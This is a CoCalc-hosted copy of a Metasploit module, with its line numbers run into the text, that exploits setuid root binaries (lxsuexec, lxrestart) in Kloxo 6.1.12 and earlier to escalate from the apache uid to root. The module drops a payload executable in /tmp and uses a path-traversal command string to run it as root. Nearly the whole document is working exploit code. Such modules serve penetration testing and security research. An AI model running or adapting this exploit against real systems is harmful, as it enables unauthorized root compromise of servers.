CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/local/kloxo_lxsuexec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Exploit::EXE9include Msf::Post::File10include Msf::Exploit::FileDropper1112include Msf::Exploit::Local::Linux1314def initialize(info={})15super(update_info(info, {16'Name' => 'Kloxo Local Privilege Escalation',17'Description' => %q{18Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as19lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,20Apache by default on CentOS 5.8, the operating system supported by Kloxo.21This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.22},23'License' => MSF_LICENSE,24'Author' =>25[26'HTP', # Original PoC according to exploit-db27'juan vazquez' # Metasploit module28],29'Platform' => [ 'linux' ],30'Arch' => [ ARCH_X86 ],31'SessionTypes' => [ 'shell' ],32'Payload' =>33{34'Space' => 8000,35'DisableNops' => true36},37'References' =>38[39[ 'EDB', '25406' ],40[ 'OSVDB', '93287' ],41[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC42],43'Targets' =>44[45[ 'Kloxo 6.1.12', {} ]46],47'DefaultOptions' =>48{49'PrependSetuid' => true50},51'DefaultTarget' => 0,52'Privileged' => true,53'DisclosureDate' => '2012-09-18'54}))55end5657def exploit58# apache uid (48) is needed in order to abuse the setuid lxsuexec binary59# .text:0804869D call _getuid60# .text:080486A2 cmp eax, 4861# .text:080486A5 jz short loc_80486B6 // uid == 48 (typically apache on CentOS)62# .text:080486A7 mov [ebp+var_A4], 0Ah63# .text:080486B1 jmp loc_8048B62 // finish if uid != 4864# .text:08048B62 loc_8048B62: ; CODE XREF: main+39j65#.text:08048B62 ; main+B0j66#.text:08048B62 mov eax, [ebp+var_A4]67#.text:08048B68 add esp, 0ECh68#.text:08048B6E pop ecx69#.text:08048B6F pop esi70#.text:08048B70 pop edi71#.text:08048B71 pop ebp72#.text:08048B72 lea esp, [ecx-4]73#.text:08048B75 retn74#.text:08048B75 main endp75print_status("Checking actual uid...")76id = cmd_exec("id -u")77if id != "48"78fail_with(Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")79end8081# Write msf payload to /tmp and give provide executable perms82pl = generate_payload_exe83payload_path = "/tmp/#{rand_text_alpha(4)}"84print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")85write_file(payload_path, pl)86register_file_for_cleanup(payload_path)8788# Profit89print_status("Exploiting...")90cmd_exec("chmod +x #{payload_path}")91cmd_exec("LXLABS=`grep lxlabs /etc/passwd | cut -d: -f3`")92cmd_exec("export MUID=$LXLABS")93cmd_exec("export GID=$LXLABS")94cmd_exec("export TARGET=/bin/sh")95cmd_exec("export CHECK_GID=0")96cmd_exec("export NON_RESIDENT=1")97helper_path = "/tmp/#{rand_text_alpha(4)}"98write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")99register_file_for_cleanup(helper_path)100cmd_exec("lxsuexec #{helper_path}")101end102end103104105